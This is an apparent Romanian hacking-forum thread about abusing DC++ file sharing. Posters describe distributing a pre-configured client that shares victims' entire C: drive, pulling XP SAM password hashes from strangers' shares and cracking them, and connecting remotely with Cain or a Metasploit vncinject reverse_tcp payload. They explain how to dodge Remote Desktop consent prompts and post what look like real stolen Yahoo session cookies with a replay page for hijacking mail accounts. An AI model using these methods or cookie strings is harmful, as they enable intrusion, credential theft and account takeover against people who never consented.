Jump to content
loki

Yahoo messenger si DC++

Recommended Posts

cauta un fisier numit DCPlusPlus.xml

dupa aceea il scrie:

<?xml version="1.0" encoding="windows-1252"?>

<DCPlusPlus>

<Settings>

.

.

.

.

</Settings>

<share>

<Directory>C:</Directory>

</Share>

</DCPlusPlus>

Chestia asta se poate modifica in visual basic.Adica faci un program care iti modifica fisieru in momentu cand l-ai executat.Sau cred ca mai bine il pui intr-un odc gata setat pentru puturosi ,astfel o sa iti cada o gramada in plasa.Asa e cand ti-e lene.:)))

Link to comment
Share on other sites

cauta un fisier numit DCPlusPlus.xml

dupa aceea il scrie:

<?xml version="1.0" encoding="windows-1252"?>

<DCPlusPlus>

<Settings>

.

.

.

.

</Settings>

<share>

<Directory>C:</Directory>

</Share>

</DCPlusPlus>

Chestia asta se poate modifica in visual basic.Adica faci un program care iti modifica fisieru in momentu cand l-ai executat.Sau cred ca mai bine il pui intr-un odc gata setat pentru puturosi ,astfel o sa iti cada o gramada in plasa.Asa e cand ti-e lene.:)))

se poate face sa apara si fisierele hidden (pwdump6 :oops: ) ?

Link to comment
Share on other sites

Oricum pwdump6 este pentru hahsu parolei de XP.Nu vad la ce iti trebuie asa ceva.Eu mi-am imbunatatit usb stealeru cu asa ceva .Adica l-am facut sa imi extraga si hashu de XP.Si daca hiar rei ceva tare iti faci propriu pachet de instalare care sa contzina odc plus alte fisiere.;). Si il pui pe un host.Unde e accesibil pentru toata lumea.Si crede-ma ca multi iau odc sau orice alt client peer to peer dupa orice site.Nu neaparat dupa siteul programului.Si ar mai fi si pe odc.Il dai share.Si sunt o groaza de lenesi care il vor lua.:D

Link to comment
Share on other sites

nu ma complic :)

dak ai access la fisieru system32/config (sam si mai cateva care sunt hidden) poti afla parola in no time :) get the point ? io nu distribui warez sau kkturi ;)

astea sunt tinute deschise, ma indoiesc ca poti avea acces, nu ai acces nici de pe compul tau... m-ai facut curios da nu intru in safe ca sa le pot citi... poti dezvolta ideea?

Link to comment
Share on other sites

Toate parolele de la conturile din XP sunt stocate in SAM. Dupa cum ai observat si tu, daca ai incerca sa copiezi/deschizi iti da un mesaj de eroare gen : this file is in use etc... ok deci daca nu poti sa-l deschizi/nu poti sa-l copiezi cum pui mana pe ce scrie in el? Simplu : bootezi de pe un liveCD (slax sa zicem) si il copiezi.

Cum functioneaza pwdump6 : ideea e sa foloseasca niste functii interne ale windowsului pt a pune mana pe informatiile necesare din SAM, dar cum aceste functii necesita privilegii speciale, iar deoarece LSASS are privilegiile necesare, pwdump injecteaza un dll in memoria acestuia compromitand astfel securitatea sistemului.

dar hashurile sunt stocate si in registrii ... o sa mai caut pe google si revin cu informatii unde ce si cum :) (poate ntuser.dat?) :D

So the three locations of the SAMHashes are:

- %systemroot%system32config

- %systemroot% repair (but only if rdisk has been run)

- In the registry under HKEY_LOCAL_MACHINE -> SAM

dar in registrii, nu reusesc sa vad nimic, cred ca nu am privilegiile necesare desi sunt admin ... mai caut :D

mi se pare mie sau cele din %systemroot%\repair\ nu sunt blocate ? \:D/

merge ! deci nu trebuie decat sa puna la share (DC++) tot c:\ si presupun ca o sa mearga sa copiezi %systemroot%\repair\

aku incerc si revin cu rezultat ;)

rezultat : am dat un search cu "repair" tip folder, si mi-a returnat vreo 14 useri care au la share folderu :D, am downloadat de la vreo 2 aku vad cu ophcrack :D revin in 10 min cu rezultat ;)

apropo...nu trebuie downloadat si "repair\software" ca ii mare fisieru >7mb :|

AM REUSIT !!!!

nu trebuie decat sa sparg parolele :)

ce spuneti facem un tutorial cu tot ce trebuie de la DC++, share C:\ apoi cum folosesti ophcrack-ul ? ;))

EDIT !!!! ASTIA NU AU PAROLA LA ADMINISTRATOR :))))) aku intru prin cain sa vad :)

hmmm..nu am reushit sa ma conectez cu cain`u ... mai caut programe sa vad ce si cum te poti conecta la un comp doar prin ip daca cunosti parola de admin sau orice alta de la un user... poate ma ajutati voi :)

apropo cei doi useri de dc++ sunt prieteni de-ai mei deci don't worry

Link to comment
Share on other sites

misto, intr-adevar cele din config nu le poti lua pe DC dar nu mi-a venit in cap ca sunt si in repair. Regf... inca n-am nimic la indemana sa vad ce contine fisierul sam.

Te referi la conectie remote (remote desktop connection)? deobicei e dezactivata, altfel te poti conecta cu remote connection numai sa fii sigur ca nu e userul la comp ca il da afara.

Intr-o retea mai poti accesa discurile cu c$ d$ e$... dar e o setare pe undeva pentru asta.

Link to comment
Share on other sites

sincer nu cunosc felul in care se conecteaza cain and abel (oxid.it) te duci la network->Quick list-> dai un plus-> bagi ip-> se conecteza->cere username si parola ->connecting....

la scoala am reusit (cu acordul adminului) sa fac asta (subretea cred k mere doar?)

Link to comment
Share on other sites

Te referi la conectie remote (remote deskdeobicei e dezactivata, altfel te poti conecta cu remote connection numai sa fii sigur ca nu e userul la comp ca il da afara.

hmmm la sc era conectat adminul iar io m-am conectat cu cain, si aveam frumos un cmd prompt in fatza :D si nu l-a scos deci presupun k nu era remote desktop

poate ma ajuti sa vedem ce si cum :)

Link to comment
Share on other sites

Te referi la conectie remote (remote deskdeobicei e dezactivata, altfel te poti conecta cu remote connection numai sa fii sigur ca nu e userul la comp ca il da afara.

hmmm la sc era conectat adminul iar io m-am conectat cu cain, si aveam frumos un cmd prompt in fatza :D si nu l-a scos deci presupun k nu era remote desktop

poate ma ajuti sa vedem ce si cum :)

Nu prea am eu timp. Intra pe un comp in system (apasa start+pause break) In panelul remote activeaza a doua optiune (allow users to connect remotely). Daca nu merge dezactiveaza firewall-ul, nu sunt sigur daca nu face probleme. Tre sa ai parola pe administrator sau pe un alt cont. Cand te conectezi asa userul curent primeste un "switch user". Daca intri pe administrator o sa ii apara mesaj "il lasi pe userul asta sa se conecteze?" si e cam riscant ca te prinde. Oricum, la mesaju asta de confirmare inchizi remote si mai dai o data, pan la urma sare peste el si te conectezi. ii dai un shutdown -r si l-ai lasat si fara mesaj.

Eu mai foloseam un program realVNC bagai IP-ul si o parola si lucrai in direct, ii miscai si mousul. Cred ca mai sunt troieni de VNC prin forum.

Link to comment
Share on other sites

ms ms :) de explicatii

da` vnc :-" nu prea am nevoie cand am metasploit ;)

scanezi niste porturi, alegi un ftp sau cv, si :-" bagi exploitu cu payload windows/vncinject/reverse_tcp ;) mere ca uns

edit : niste tutoriale pt metasploit http://www.learnsecurityonline.com/index.php?option=com_content&task=category&sectionid=7&id=26&Itemid=66

si vid-ul care m-a pornit spre pentesting http://www.learnsecurityonline.com/vid/MSF3-VNC/MSF3-VNC.html

Link to comment
Share on other sites

Ce valori trebuie sa ia t si y supa executarea codului php?

Iau tot ce este dupa t= si inlocuiesc & cu %26 ma rog... asta stiu.

Unu gasit acum pe dc++:

*

T

z=bsdhIBbAFmIBduDz3nS1xeRMzIxBjUwMzRPNjQzTk8-&a=QAE&sk=DAACrSVJMrz9D9&ks=EAAQnWzpE2ge3RIHC3OEMhGWg--~A&d=c2wBTkRVMkFUSTNORE00TVRNME9UZy0BYQFRQUUBZwFWNFM2RTdLUzNMNTZHNzY1RUI2TE1SNkRGTQF0aXABWlJ5WElCAXp6AWJzZGhJQkE3RQ--

yahoo.com/

1024

342532096

32065574

2597022208

29944827

*

*

Y

v=1&n=e77l80t3dbetl&l=5beh8d_f0i0h8i/o&p=m2606qo013000000&r=i6&lg=en-US&intl=us

yahoo.com/

1024

342532096

32065574

2595622208

29944827

*

=================

altu

=================

*

T

z=kMMCGBkgzGGB5x2u76GuDVUNE41BjUzMDZOM040MzY-&a=QAE&sk=DAAUW114rtd.Us&d=c2wBTXpreUFUSTBOekU1TkRrek5ERS0BYQFRQUUBdGlwAVZ4c2wxQQF6egFrTU1DR0JBN0U-

yahoo.com/

1024

342532096

32065574

3672148256

29847614

*

*

Y

v=1&n=7haf5ld1srpph&l=l0b4h80a8h8be5/o&p=f24vvrob13000100&jb=26|77|&iz=820203&r=fr&lg=us&intl=us

yahoo.com/

1024

342532096

32065574

3671828256

29847614

*

==========

si inca unu

==========

*

Y

v=1&n=d92ej6h28m49r&l=ikd08j_rz/o&p=m2o0sa8013000000&r=g6&lg=en-US&intl=us

yahoo.com/

1024

342532096

32065574

1006129728

29942707

*

T

z=sW/dIBsqmiIBxdRjP8u7j7VMjI0BjYyMjdONU8wTk4-&a=QAE&sk=DAA7YZMPX8qdre&ks=EAA6qeD7cXNYpCwW33D3XVAaw--~A&d=c2wBTlRVekFURTFOVEE1TWpnM09Uay0BYQFRQUUBZwFFQjJaTVMzNExWTU9LV0tIUVpQSElYTlRLRQF0aXABVzEzXzFBAXp6AXNXL2RJQkE3RQ--

yahoo.com/

1024

342532096

32065574

1006439728

29942707

*

===================

===================

*

Y

v=1&n=3fks7alugtmo0&l=b0i2k_c8704b0qz/o&p=f2kvvro012000000&iz=105800&r=ip&lg=en-US&intl=us

yahoo.com/

1024

342532096

32065574

3696614288

29944972

*

T

z=C7shIBCPUmIBYRpA14rkk1jMzE3BjVPMzAzNzY0TjM-&a=QAE&sk=DAAdKQjh1d4q2p&ks=EAADlHgsTi.WBAjHH.MQdV2QQ--~A&d=c2wBTkRZd0FUSTRORGMwTURFek9UUS0BYQFRQUUBZwFOUjJDRzM2UVRRSjZaUERWTEEyT1hRUzZLWQF0aXABWkZTeEpDAXp6AUM3c2hJQkE3RQ--

yahoo.com/

1024

342532096

32065574

3696764288

29944972

*

Am gasit unu care avea doar T ? Ce inseamna mai exact t si y?

Link to comment
Share on other sites

mie imi apare ceva de genu

B

b3ak3up3tvq0i&b=4&s=ik

yahoo.com/

1024

342532096

32065574

3877821440

29944235

*

LYC

l_v=2&l_lv=10&l_l=0_h4iyr&l_s=qz54t4qwrsqquyv51w0z4xxwtx31x1t0&l_lid=illhe1&l_r=ib&l_lc=0_0_0_0_0&l_um=0_0_0_0_0

yahoo.com/

1024

3138338816

32108254

1086519488

29928147

*

YMRAD

1971887928*0_0_39468776_1_0_39468566_1_0_7318699_1

yahoo.com/

1088

2004320256

30638739

706422576

29920944

*

YLS

v=1&p=1&n=0

yahoo.com/

1600

546742272

32055918

2380342400

29930600

*

F

a=dY50UasMvTBd8eSClg4j9P6MZsNswrHu5y8NfGSCFfCtnMN2gDeKPWLSJsd3Ry7lHONAbyK_mzGH2cd6QdiH2ihhCg--&b=RU3C

yahoo.com/

1024

342532096

32065574

3877971440

29944235

*

PH

fn=pdhgJAhQ0uX7izNC&l=en-US

yahoo.com/

1024

342532096

32065574

1836532432

29934583

*

C

mg=1

yahoo.com/

1024

342532096

32065574

2356442128

29928307

*

U

mt=Z9Mk5J2MhYlSXCbu.2z0B3Gqg1IreYUWqjKD&ux=YofgIB&un=9pefamtda71d9

yahoo.com/

1024

985407488

30072022

3743601440

29944235

*

al meu e mai smecher are U , C, PH ,F care`i faza de apare asha? O_o

EDIT

Deci.. nush ce am putut face gresit .. dar scriptul nu functioneaza bine. Uitati aici cum arata la mine : www.schwarz.uv.ro/cookie.html .

Si asa apare dupa ce bag Y si T : http://schwarz.uv.ro/%3C?cookie=Y%0D%0Av%253D1%2526n%253D16jj66q28tgd5%2526l%253D5beh8dss98c%2Fo%2526p%253Dm2b0tqc013000000%2526r%253Di9%2526lg%253Den-US%2526intl%253Dus%2526np%253D1%0D%0A%7E%7Elocal%7E%7E%2FC%3A%5CProgram+Files%5CYahoo%21%5CMessenger%5C%0D%0A1088%0D%0A821472384%0D%0A29923296%0D%0A114898880%0D%0A29923095%0D%0A*%0D%0AT%0D%0Az%253Dgt29HBgzL.HBzTBBC40x%2FeiMzIyBjUwMTQ2T04zMzY-%2526a%253DQAE%2526sk%253DDAA4pJIYySoaKe%2526ks%253DEAA24T2U3ZstaKk_.YnOFuqOA--%257EA%2526d%253Dc2wBTkRVMUFUSTNOak14T0RrME5ERS0BYQFRQUUBZwF5Ri44VktUdW1WeVBubDB6MTVhTTdnLS0BenoBZ3QyOUhCZ1dBAXRpcAFadEhINUI-%0D%0A%7E%7Elocal%7E%7E%2FC%3A%5CProgram+Files%5CYahoo%21%5CMessenger%5C%0D%0A1088%0D%0A821472384%0D%0A29923296%0D%0A114898880%0D%0A29923095%0D%0A*%0D%0A

poate raspunde cineva la problema asta , si eu am acceeasi problema :|

Am copiat asta :

*
Y
v=1&n=3fks7alugtmo0&l=b0i2k_c8704b0qz/o&p=f2kvvro012000000&iz=105800&r=ip&lg=en-US&intl=us
yahoo.com/
1024
342532096
32065574
3696614288
29944972
*
T
z=C7shIBCPUmIBYRpA14rkk1jMzE3BjVPMzAzNzY0TjM-&a=QAE&sk=DAAdKQjh1d4q2p&ks=EAADlHgsTi.WBAjHH.MQdV2QQ--~A&d=c2wBTkRZd0FUSTRORGMwTURFek9UUS0BYQFRQUUBZwFOUjJDRzM2UVRRSjZaUERWTEEyT1hRUzZLWQF0aXABWkZTeEpDAXp6AUM3c2hJQkE3RQ--
yahoo.com/
1024
342532096
32065574
3696764288
29944972
*

aici

http://schwarz.uv.ro/cookie.html

si degeaba , mi se intapla la fel ca la el... :|

Link to comment
Share on other sites

...

poate raspunde cineva la problema asta , si eu am acceeasi problema :|

Am copiat asta :

*
Y
v=1&n=3fks7alugtmo0&l=b0i2k_c8704b0qz/o&p=f2kvvro012000000&iz=105800&r=ip&lg=en-US&intl=us
yahoo.com/
1024
342532096
32065574
3696614288
29944972
*
T
z=C7shIBCPUmIBYRpA14rkk1jMzE3BjVPMzAzNzY0TjM-&a=QAE&sk=DAAdKQjh1d4q2p&ks=EAADlHgsTi.WBAjHH.MQdV2QQ--~A&d=c2wBTkRZd0FUSTRORGMwTURFek9UUS0BYQFRQUUBZwFOUjJDRzM2UVRRSjZaUERWTEEyT1hRUzZLWQF0aXABWkZTeEpDAXp6AUM3c2hJQkE3RQ--
yahoo.com/
1024
342532096
32065574
3696764288
29944972
*

aici

http://schwarz.uv.ro/cookie.html

si degeaba , mi se intapla la fel ca la el... :|

fmm adica mau mult de mura in gura ce level de explicatii se poate da? Ca nu bag mura-n blender. Raspuns:

81202579ic4.th.png

Daca nu citeste nimeni altceva decat titlul unui topic, de ce va obositi sa reformulati o intrebare? Bine ca toata lumea are parte de sesiuni yahoo din intrebarile voastre.

PS si ii mai si merge cookie dupa 5 zile, inseamna ca nici fata habar n-are de mail si n-o intereseaza.

Link to comment
Share on other sites

lokipaki nu trebuie sa te enervezi asa repede sunt incepator si vreau sa inteleg si eu ceva din tot forumu asta...

incepi cu fmm ...eu am pus doar o intrebare , de fapt ...era o intrebare foarte simpla sunt sigur ca ti sa intamplat si tie asa vreodata...si ma gandeam ca sti solutia ..dar nuuu ,tu rebuie intai sa injuri :(

Link to comment
Share on other sites

lokipaki nu trebuie sa te enervezi asa repede sunt incepator si vreau sa inteleg si eu ceva din tot forumu asta...

incepi cu fmm ...eu am pus doar o intrebare , de fapt ...era o intrebare foarte simpla sunt sigur ca ti sa intamplat si tie asa vreodata...si ma gandeam ca sti solutia ..dar nuuu ,tu rebuie intai sa injuri :(

Da, scuze, ma enervez repede cand vad intrebari la care am raspuns.

imi retrag fmm-ul:)

pace!

(fmm=find my messages :P )

Link to comment
Share on other sites

salut.am urmat pasii pe care i-ai dat, am introdus un cookie valabil dar cand dau click pe Test Cookie link imi apare eroarea urmatoare "The page cannot be displayed

The page you are looking for is currently unavailable. The Web site might be experiencing technical difficulties, or you may need to adjust your browser settings."

daca e greseala de newbie si nu-mi dau eu seama, sry

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




×
×
  • Create New...